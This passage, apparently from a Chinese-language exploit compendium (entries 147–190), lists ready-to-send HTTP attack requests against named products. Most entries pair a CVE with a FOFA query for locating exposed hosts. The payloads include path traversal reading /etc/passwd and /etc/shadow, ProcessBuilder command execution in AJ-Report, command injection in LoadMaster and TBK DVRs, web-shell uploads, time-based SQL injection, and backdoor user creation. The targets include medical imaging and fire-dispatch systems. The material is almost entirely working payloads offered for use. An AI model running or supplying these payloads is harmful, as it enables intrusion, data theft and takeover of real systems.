User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 (LVS) value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle GPS monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"

 
------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
